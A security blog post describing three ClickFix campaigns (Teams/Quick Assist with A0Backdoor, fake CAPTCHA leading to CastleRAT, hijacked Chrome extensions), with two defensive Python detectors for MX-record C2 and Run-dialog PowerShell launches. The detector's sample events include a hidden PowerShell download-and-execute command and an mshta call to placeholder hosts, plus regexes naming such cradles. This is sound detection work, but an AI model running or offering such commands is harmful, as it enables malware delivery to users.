There’s a social engineering trick dominating breach reports right now, and it’s embarrassingly simple.

A user sees a prompt. It says paste this command. Into PowerShell. Into the Windows Run dialog. Whatever. The prompt looks official. The user complies. Malware runs.

That’s ClickFix. And this past week alone, it showed up in three separate campaigns from different threat actors with different payloads. Same technique. Different bad guys. Uniformly terrible results.

Campaign one: Attackers flood a victim’s inbox with spam to create confusion, then message them on Microsoft Teams pretending to be IT support. “Open Quick Assist so we can help.” Once they’ve got remote access through that legitimate Windows tool, they drop a brand-new backdoor called A0Backdoor. The clever bit? It uses DNS MX records for command-and-control instead of the usual TXT records. Most DNS monitoring tools aren’t tuned for that. BlueVoyant links this to former BlackBasta ransomware operators regrouping with new tools.
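A starting point for closing the monitoring gap the paragraph describes, written as an added example for this post (not BlueVoyant's detection and not anything taken from A0Backdoor): workstations almost never need MX lookups, and a backdoor that tunnels C2 over MX has to issue many of them, to many distinct names under one parent domain, often with encoded data in the leftmost label. The log format, the mail-server allowlist, the thresholds and the domain names below are all constructed for the demonstration.

```python
"""Flag hosts whose DNS MX queries look like tunnelled command-and-control.

Constructed example: a single workstation beaconing to a C2 domain over MX
lookups, mixed with ordinary traffic. The log format ("<time> <client> <qtype>
<qname>"), the allowlist and the thresholds are assumptions for this demo.
"""
from collections import defaultdict
import math
import re

# Constructed DNS query log; 10.0.0.25 is the mail relay, 10.0.0.5 a workstation.
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.5 A www.example.com
2024-01-01T10:00:02 10.0.0.25 MX example.com
2024-01-01T10:00:05 10.0.0.5 MX 6a7b3c9d1e2f.cmd.bad-domain.test
2024-01-01T10:00:35 10.0.0.5 MX 0f1e2d3c4b5a.cmd.bad-domain.test
2024-01-01T10:01:05 10.0.0.5 MX 9e8d7c6b5a4f.cmd.bad-domain.test
2024-01-01T10:01:35 10.0.0.5 MX a1b2c3d4e5f6.cmd.bad-domain.test
2024-01-01T10:02:00 10.0.0.7 A login.microsoftonline.com
2024-01-01T10:02:05 10.0.0.5 MX 1122334455aa.cmd.bad-domain.test
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$")

# Hosts that legitimately resolve MX records (assumption: only the mail relay).
MAIL_SERVERS = {"10.0.0.25"}
MX_COUNT_THRESHOLD = 3        # more MX queries than this from a non-mail host is unusual
DISTINCT_NAME_THRESHOLD = 3   # many distinct names under one parent = data carried in labels


def parse_log(text):
    """Parse the constructed log format into a list of dicts; skips malformed lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def label_entropy(label):
    """Shannon entropy (bits per character) of one DNS label; encoded data scores high."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_domain(qname, levels=2):
    """Return the last `levels` labels of a name (a rough registrable-domain key)."""
    return ".".join(qname.rstrip(".").split(".")[-levels:])


def find_mx_beacons(records):
    """Return {client: {parent, count, distinct, max_entropy}} for clients whose
    MX query pattern exceeds both thresholds against a single parent domain."""
    per_client = defaultdict(lambda: defaultdict(
        lambda: {"count": 0, "names": set(), "max_entropy": 0.0}))
    for r in records:
        if r["qtype"] != "MX" or r["client"] in MAIL_SERVERS:
            continue
        bucket = per_client[r["client"]][parent_domain(r["qname"])]
        bucket["count"] += 1
        bucket["names"].add(r["qname"])
        first_label = r["qname"].split(".")[0]
        bucket["max_entropy"] = max(bucket["max_entropy"], label_entropy(first_label))

    findings = {}
    for client, domains in per_client.items():
        for parent, b in domains.items():
            if b["count"] > MX_COUNT_THRESHOLD and len(b["names"]) >= DISTINCT_NAME_THRESHOLD:
                findings[client] = {
                    "parent": parent,
                    "count": b["count"],
                    "distinct": len(b["names"]),
                    "max_entropy": round(b["max_entropy"], 2),
                }
    return findings


if __name__ == "__main__":
    for client, info in find_mx_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{client}: {info['count']} MX queries to {info['distinct']} names "
              f"under {info['parent']} (max label entropy {info['max_entropy']})")
```

The same shape of rule applies to any record type a resolver log exposes; the point is that the query type is part of the baseline, so an endpoint switching to MX (or any type it has never used) stands out even when each individual query looks benign.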

Campaign two: The Termite ransomware crew is running fake CAPTCHA pages that tell victims to open a Run dialog and paste a command. That kicks off PowerShell, which downloads a shellcode loader, which deploys CastleRAT, which sets the table for ransomware. The whole chain runs on legitimate Windows utilities. Nothing exotic in the tooling. All the innovation is in the social engineering.

Campaign three: Two Chrome extensions, QuickLens and ShotBird, were purchased by threat actors and updated with malicious code. QuickLens strips security headers, fingerprints your browser, and pulls payloads from a C2 server every five minutes. The malicious code never appears in the extension source files. It only exists at runtime. ShotBird went simpler: fake Chrome update page, ClickFix-style prompt, malware named googleupdate.exe. It had “Featured” status in the Chrome Web Store before the ownership transfer.

So why does this keep working? There’s no zero-day here. No memory corruption. No sandbox escape. It’s just a user doing what a prompt tells them to do.

And that’s exactly the problem. Modern computing has trained people to comply with prompts. Prove you’re not a robot. Run this update. Re-authenticate. Call support. Every one of those normal interactions builds a reflex: do what the screen says. ClickFix takes that reflex and turns it into a weapon.

From the attacker’s side, it’s cheap, hard to detect at the endpoint, and works across industries. That’s why multiple unrelated groups have all landed on the same approach.

What to do about it:

Train your people against this specifically. Generic phishing training won’t cut it because there’s no malicious attachment or sketchy link. Just a prompt that says “paste this.” Users need to understand that no legitimate process will ever ask them to paste commands into a system prompt.

Lock down Quick Assist via group policy if you don’t use it. Manage Chrome extensions with an allowlist. And watch for unusual PowerShell execution from Run dialogs or pasted commands. If your EDR isn’t flagging that, fix it.
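The detection advice above, and the Run dialog to PowerShell chain from campaign two, both come down to one observable: a script host started from the Explorer shell (the Run dialog is hosted by explorer.exe, so anything pasted into it shows up as a child of explorer.exe) whose command line carries a download, eval or encoded-command cradle. The rule below is an added example written for this post, not any EDR's logic. The records follow the field names of Sysmon Event ID 1 but are constructed; the .invalid domains and the base64 blob are placeholders, not real payloads.

```python
"""Spot ClickFix-style launches in process-creation telemetry.

Rule: parent is the Explorer shell, child is a script/shell host, and the
command line shows a download, an eval or an encoded command. An interactive
shell opened from Explorer without those is left alone on purpose.
Constructed Sysmon-like events; field names mirror Sysmon Event ID 1.
"""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SHELL_PARENTS = {"explorer.exe"}  # Run dialog (Win+R) launches are children of explorer.exe

# Indicator categories; "stealth" alone never triggers, it only enriches a finding.
CRADLE_PATTERNS = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|https?://", re.I),
    "eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "stealth": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|executionpolicy\s+bypass", re.I),
}
TRIGGER_CATEGORIES = ("download", "eval", "encoded")

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events. 4120 and 4301 are ClickFix-style; 4188 is a user opening a
# console; 4402 is a service-launched encoded command (a different rule's job).
SAMPLE_EVENTS = [
    {"EventId": 1, "ProcessId": 4120, "Image": PS_PATH, "ParentImage": EXPLORER, "User": "CORP\\jdoe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://captcha.example.invalid/verify.ps1')\""},
    {"EventId": 1, "ProcessId": 4188, "Image": PS_PATH, "ParentImage": EXPLORER, "User": "CORP\\jdoe",
     "CommandLine": "\"" + PS_PATH + "\""},
    {"EventId": 1, "ProcessId": 4301, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": EXPLORER,
     "User": "CORP\\asmith", "CommandLine": "mshta https://update.example.invalid/chrome"},
    {"EventId": 1, "ProcessId": 4402, "Image": PS_PATH, "ParentImage": r"C:\Windows\System32\services.exe",
     "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "powershell.exe -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA"},  # placeholder base64
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(command_line):
    """Return the list of indicator categories matched by a command line."""
    return [name for name, pat in CRADLE_PATTERNS.items() if pat.search(command_line)]


def detect_clickfix(events):
    """Return findings for process-creation events that match the rule."""
    findings = []
    for ev in events:
        if ev.get("EventId") != 1:
            continue
        if basename(ev["ParentImage"]) not in SHELL_PARENTS:
            continue
        if basename(ev["Image"]) not in SCRIPT_HOSTS:
            continue
        hits = classify(ev.get("CommandLine", ""))
        if not any(h in hits for h in TRIGGER_CATEGORIES):
            continue  # plain interactive shell from Explorer: normal
        findings.append({
            "ProcessId": ev["ProcessId"],
            "User": ev.get("User"),
            "Image": basename(ev["Image"]),
            "Indicators": hits,
        })
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"PID {f['ProcessId']} {f['Image']} as {f['User']}: {', '.join(f['Indicators'])}")
```

The parent check is deliberately narrow: a command pasted into an already-open terminal has a different parent, and a scheduled task or service launching an encoded PowerShell is a separate hunt. For triage after the fact, the Run dialog also keeps its history in the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is worth pulling alongside the process tree.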

You can’t patch user behavior. But you can shrink the blast radius by limiting what’s available on their workstations and making the weird prompt feel wrong instead of routine.


Read the full story on gNerdSEC